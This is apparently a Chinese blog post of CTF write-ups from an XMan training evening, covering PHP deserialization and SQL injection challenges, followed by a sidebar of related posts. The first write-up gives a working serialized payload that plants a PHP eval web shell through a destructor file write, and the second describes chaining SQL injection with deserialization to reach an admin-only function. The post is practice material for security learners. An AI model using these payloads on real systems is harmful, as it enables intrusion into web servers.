xman 8-16晚自习解题记录

最新推荐文章于 2022-10-23 23:31:59 发布
最新推荐文章于 2022-10-23 23:31:59 发布
阅读量134 收藏
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53755216/article/details/119740326
版权

文章目录

singin

第一题直接给了源码

<?php
show_source(__FILE__);
$dir = './sandbox/'.md5($_SERVER['REMOTE_ADDR']);
echo $dir;
echo "<br>";
is_dir($dir) ?: mkdir($dir);
$line = $_GET['a'];
class B {
    public $content;
    public $filename;
    function __destruct() {
        if(strstr($this->filename,'..')){
            die('No');
        }else{
            file_put_contents('./sandbox/'.md5($_SERVER['REMOTE_ADDR']).'/'.$this->filename, $this->content);
        }
        
    }
}
$a = @unserialize($line);
system('rm -rf '.$dir);
echo "unserialize yyds";

#./sandbox/1b5337d0c8ad813197b506146d8d503d
#unserialize yyds

看一下 class B
如果 … 在 filename 中 就不行
else 将会把 filename 和 content 写进 sandbox 里
反序列化过后 又执行了 rm -rf 把文件给删掉( 但反序列化已经执行过了

考虑payload 因为pdo 类无法被解析 导致报错 使反序列化终止 但仍然执行 __destruct

O:1:"B":3:{s:7:"content";s:31:"<?php echo 1;eval($_POST[a]);>";s:8:"filename";s:5:"1.php";s:6:"decade";O:3:"pdo":0:{};}

参考:
https://github.com/ambionics/phpggc
https://oatmeal.vip/ctf-wp/bytectffinalsignup/

upload

先看拿flag的方式

看到 common.php 中的 XCTFGG 类

class XCTFGG{
    private $method;
    private $args;

    public function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }

    function login() {
        list($username, $password) = func_get_args();
        $username = strtolower(trim(mysql_escape_string($username)));
        $password = strtolower(trim(mysql_escape_string($password)));

        $sql = sprintf("SELECT * FROM user WHERE username='%s' AND password='%s'", $username, $password); 

        global $db;
        $obj = $db->query($sql);

        $obj = $obj->fetch_assoc();

        global $FLAG;

        if ( $obj != false && $obj['privilege'] == 'admin'  ) {
			die($FLAG);
        } else {
			die("Admin only!");
        }
    }

    function __destruct() {
        @call_user_func_array(array($this, $this->method), $this->args);     // 这里就不得了了
    }

}

应该是反序列化来调用 这个类
在 upload.php 中 找到了 反序列化的入口
所以说 貌似和上传没什么关系?

我们想要拿到 flag 就要

if ( $obj != false && $obj['privilege'] == 'admin'  ) {
			die($FLAG);
        }

而 obj

    $sql = sprintf("SELECT * FROM user WHERE username='%s' AND password='%s'", $username, $password); 

        global $db;
        $obj = $db->query($sql);

        $obj = $obj->fetch_assoc();

而我们看到了数据库文件中

# INSERT INTO user VALUES ('XM', $db_pass, 'admin')

我们由于知道数据库结构 所以说注入是很方便的
我们唯一要知道的就是 $db_pass

只需要找到一个注入点即可
而 rename.php 显然提供给我们了这样一个机会
得到密码

qweqweqwe2333

所以直接注入后得到密码 然后 直接反序列化 拿到flag

ezpython

sql注入 加 ssti

b1ue0cean
关注
专栏目录
[WP]第五届XMan选拔赛web
xiongshivigor的博客
08-11 410
第五届XMan选拔赛 本次比赛一共三道web,一道签到题就不用说了,另外两道貌似也都不是很难的题,但是确实水个人平太菜,没都做做出来,还是逐步积累经验吧 easyphp <?php error_reporting(0); highlight_file(__FILE__); class XMAN{ public $class; public $para; public $check; public function __construct() {
练习-CTF解题 - XMAN比赛 8-8-babyweb(netspark扫扫)
Gunther的博客
09-08 1807
http://202.112.51.217:8199/uploads/
Xman资格选拔赛-web
weixin_30709929的博客
07-20 849
variacover 这道题一打开就是源码,主要就是根据源码构造url。其中,它接收的参数只有b,但源码中要获取flag的关键参数是a[0]。parse_str()函数的作用是把查询字符串解析到变量中,于是我们可以通过将a[0]嵌入b的传参中,然后由这个函数再将a[0]提取出来,解析出a[0]后,还需要满足其值是MD5加密后与MD5('QNKCDZO’)的值相等,但加密前的字符串不相等,因为QN...
XMAN选拔赛官方Writeup
热门推荐
zsj2102的专栏
07-20 2万+
XMan选拔赛官方Writeup XMan 2017 Baaa [原理] 栈溢出。 [目的] 盲打栈溢出。 [环境] Ubuntu。 [工具] gdb、objdump、python。 [步骤] 拿到题目,发现并没有给二进制,估计是盲打。nc一下,发现返回了一个地址,我们尝试不同大小payload,最后确定下来大约为72位junk加上16位的地址。 exp from
CTF_Web:反序列化学习笔记(二)CTF经典考题由浅至深
AFCC_的博客(Web_Dog)
08-16 7187
0x00 CTF中的反序列化题目 这类题目中主要是利用反序列化各种魔术方法的绕过或调用,从而构造符合条件的序列化字符串,完成特定的功能,在这一点上对于整个代码段的执行流程要很清楚。我们先从最简单的开始看起。 0x01 攻防世界unserialize3 题目显示的源码为: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 在这里我们可以看到只有一个魔术方法,而__w
CTF-web Xman-2018 第四天 WEB 初讲
iamsongyu的博客
12-11 880
web作为CTF中的一类大题目,涉及的面非常广,前面具体也说过一些类别的题目。 https://blog.csdn.net/iamsongyu/article/details/82968532 l给定一个web网站 l根据题目所给提示信息,找到网站上的flag字符串 l做题方式类似于真实渗透,可能涉及信息收集、各类漏洞发现与利用、权限提升等等 l为了获取flag,可能需要拿到管理员权限,...
buu [QCTF2018]Xman-RSA
shshss64的博客
10-23 923
混合的rsa加密(古典密码+rsa)
buuctf————[QCTF2018]Xman-babymips
yhfgs的博客
10-06 443
1、查壳。 无壳,32位。 2.IDA反编译。 两个位置有加密。 第一个位置: 第二个位置: 大体思路:前五位就是第一个位置加密,之后的是两个位置一起加密得出。 前五位很好得逆出:qctf{ 之后的位置我一开始想要逆出来。(太自信了,我还是个菜鸡)发现不会,就搜了大佬的wp (大部分是爆破出来的)发现他的解密脚本有位置看不懂,转战爆破。 贴出来:(不知道&的值是怎么来的,还是太菜了。) 3爆破脚本。(%0x100是为了防止溢出。) 4.get...
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
xman-frontend
05-29
Xman 前端 运行项目 克隆项目 运行npm install或yarn 运行npm start或yarn start 与后端集成 前端通过 REST API 连接到后端的不同服务。 服务的文档链接如下 如果您需要访问用户的访问令牌,您可以通过 import ...
[QCTF2018]Xman-RSA
2er0!=O的博客
08-01 485
[QCTF2018]Xman-RSA 附件: ciphertext: 1240198b148089290e375b999569f0d53c32d356b2e95f5acee070f016b3bef243d0b5e46d9ad7aa7dfe2f21bda920d0ac7ce7b1e48f22b2de410c6f391ce7c4347c65ffc9704ecb3068005e9f35cbbb7b27e0f7a18f4f42ae572d77aaa3ee189418d6a07bab7d93beaa365c9834
XCTF:练习CTF解题XMAN比赛 8-8 login
Gunther的博客
09-05 1969
login 首先查看源码(看关键点): 因为是post方式那么我们就利用bp. 在登陆页面输入username=admin,,password=admin得到下面信息: 下面分析: if ($result!=null&&$result->rowCount()==1) { echo $flag; }搜了一下P
CTF-web Xman-2018 第四天 WEB习题1
iamsongyu的博客
12-11 1692
例题 localhoost访问 更改x-forwarded-for=127.0.0.1   api调用  http://web.jarvisoj.com:9882/ 目录扫一下没什么特别的东西,看一下源码发现了关键代码 &lt;script&gt; function XHR() { var xhr; try {xhr = new XMLHttpReque...
工控流量分析题+wireshark学习
qq_53755216的博客
06-28 1万+
写在前面 暑假报名了工控比赛 所以要找些工控的题目来刷刷 正好比赛方提供的靶场有很多类似的题目 开始痛苦的学习过程。。。 Wireshark Capture filter <Protocol name> <Direction><Host(s)><Value><Logical operations><Expression> 如何看带 <Logical operations> 1.<Protocol name>&l
CyBBICS CTF(wp + 复现)
qq_53755216的博客
07-29 5338
Ad Network (Web, Baby, 500 pts) We are so tired of advertising on the internet. It feels like it breaks the internet. Try to follow the ad, try to follow its rules. There is a flag 1337 redirects deep into the network… 我们厌倦了在互联网上做广告。感觉就像它打破了互联网。尝试遵循广告,尝试遵
CTFHUB-HTTP-HTTP临时重定向
qq_53755216的博客
01-22 2898
文章目录前言一、题目:解决重定向问题二、解题步骤1.了解重定向是啥?2.思考:总结 前言 一、题目:解决重定向问题 二、解题步骤 1.了解重定向是啥? 301和302状态码都表示重定向,就是说浏览器在拿到服务器返回的这个状态码后会自动跳转到一个新的URL地址,这个地址可以从响应的Location首部中获取(用户看到的效果就是他输入的地址A瞬间变成了另一个地址B) 301表示旧地址A的资源已经被永久地移除了(这个资源不可访问了),搜索引擎在抓取新内容的同时也将旧的网址交换为重定向之后的网址; 302表示旧地
CTFHUB-HTTP协议-请求方式
qq_53755216的博客
01-22 2262
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 入坑第一题前言题目二、解答1.bp拦截包2.将请求发送至repeater,更改method再次send总结 前言 第一题试水 题目 HTTP Method is GET Use CTF**B Method, I will give you flag. Hint: If you got 「HTTP Method Not Allowed」 Error, you should request index.php. 二、解答 1.bp拦截包 代
phar反序列化学习
qq_53755216的博客
06-09 1410
phar反序列化 什么是phar文件 phar文件本质上是一种压缩文件,会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时,会自动反序列化meta-data内的内容。 PHAR (“Php ARchive”) 是PHP里类似于JAR的一种打包文件。如果你使用的是 PHP 5.3 或更高版本,那么Phar后缀文件是默认开启支持的,你不需要任何其他的安装就可以使用它。 在软件中,PHAR(PHP归档)文件是一种打包格式,通过将许多PHP代码文件和其他资源(例如
工业安全CTF
qq_53755216的博客
07-21 1268
10.Modbus采样分析 安全巡检工程师会对控制设备运行情况进行检测分析,某日突然在流量中发现攻击者截取了工程师站采集数据的命令,并将采集命令进行了恶意篡改,导致上层无法获取设备正确的运行信息,影响企业正常生产运行,请分析出被篡改的恶意采集数据报文,获取flag。flag格式为:flag{} 直接wireshark 拿出来 硬看 要找出 采集数据的命令 4.图片隐写题 binwallk和 fromost跑了一下 什么都没出 拿到 010editor里看一下 看不懂 6.OPC协议分析 筛选出DCERP
XMAN := xman -prj ${PRJ_NAME}详细解释解释上述makefile
最新发布
04-28
这是一个 Makefile 中的变量赋值语句,它将 xman 变量的值设置为 `${PRJ_NAME}` 变量的值,并在变量名称前添加了 `-prj` 前缀。这个 Makefile 似乎是为了某个工程项目(即 `${PRJ_NAME}`)而编写的,XMAN 变量可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值